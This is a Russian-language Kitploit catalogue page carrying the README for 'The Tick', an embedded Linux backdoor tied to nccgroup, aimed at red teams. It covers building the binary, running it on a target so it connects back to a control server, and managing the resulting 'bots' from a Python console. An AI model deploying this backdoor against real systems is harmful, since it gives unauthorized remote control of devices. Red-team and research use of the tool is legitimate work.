Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
thetick — A simple embedded Linux backdoor. | Kitploit
Инструменты/GitHubGitHub/nccgroup/thetick
Embedded Systems SecurityPersistence MechanismsPost-ExploitationCommand and ControlRed TeamingRemote Access Tool
GitHubnccgroup/thetick

thetick

A simple embedded Linux backdoor.

Репозиторий
198345 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

The Tick

Простой бэкдор для встраиваемых Linux-систем.

  • The Tick
    • Компиляция
    • Установка
    • Использование
    • Медиа

Скриншот 1

Компиляция

The Tick зависит только от libcurl, поэтому убедитесь, что у вас установлен соответствующий пакет для разработки. Например, в дистрибутивах на основе Debian это делается так:

root@kitploit:~
sudo apt-get install libcurl-dev

После установки зависимостей просто запустите makefile:

root@kitploit:~
cd src
make clean
make

После завершения выполнения команды "make" скомпилированный бинарный файл можно найти в папке "bin". Именно этот бинарный файл нужно запустить на целевой машине, чтобы управлять ею удалённо.

При кросс-компиляции для поддерживаемых платформ разрешение зависимостей и компиляция выполняются автоматически. В настоящее время единственная поддерживаемая платформа для кросс-компиляции — принтер Lexmark CX310DN, но в будущем будут добавлены другие устройства. Подробности смотрите в makefile.

Консоль управления написана на Python и поэтому не требует компиляции.

Установка

Обеспечение закрепления бэкдора сильно зависит от целевой платформы и поэтому здесь не описывается.

На целевой машине запустите бинарный файл бэкдора со следующими аргументами:

root@kitploit:~
./ticksvc ADDR PORT

Замените "ADDR" и "PORT" на IP-адрес и порт, которые будет прослушивать консоль управления. Порт по умолчанию — 5555.

Консоль управления не требует установки, но у неё могут быть нерешённые зависимости. Выполните следующую команду, чтобы убедиться, что все зависимости установлены надлежащим образом (обратите внимание: sudo не требуется):

root@kitploit:~
pip install --upgrade -r requirements.txt

В большинстве графических окружений Linux следующий файл "Tick.desktop" создаст значок, по двойному щелчку на котором запускается консоль:

root@kitploit:~
[Desktop Entry]
Encoding=UTF-8
Value=1.0
Type=Application
Name=The Tick
GenericName=The Tick
Comment=An embedded Linux backdoor
Icon=/opt/thetick/doc/logo.png
Exec=/opt/thetick/tick.py
Terminal=true
Path=/opt/thetick/

Точное расположение файла Tick.desktop может различаться в зависимости от дистрибутива Linux, но обычно достаточно поместить его на рабочий стол. Обязательно отредактируйте путь, указав каталог, куда вы скачали The Tick (в примере выше — /opt/thetick).

Использование

Чтобы запустить бинарный файл бэкдора на целевой платформе, укажите имя хоста и порт управляющего сервера в качестве параметров командной строки. Например:

root@kitploit:~
./ticksvc control.example-domain.com 5555

На управляющем сервере консоль, возможно, стоит запустить внутри GNU screen или аналогичной утилиты:

root@kitploit:~
sudo apt-get install screen
screen -S thetick ./thetick.py

Таким образом вы сможете отключиться от консоли, нажав Control+A, а затем D. Вернуться к консоли позже можно так:

root@kitploit:~
screen -r thetick

Консоль сообщит вам, когда к ней подключится новый бот. Команда "bots" показывает список подключённых ботов, а команда "use" выбирает бота для работы. Команда "help" выводит руководство пользователя.

Вот несколько скриншотов, иллюстрирующих возможности консоли:

Скриншот 2

Скриншот 3

Медиа

The Tick упоминался в следующем докладе на 44Con (авторы — Daniel Romero и Mario Rivas):

Скачать инструмент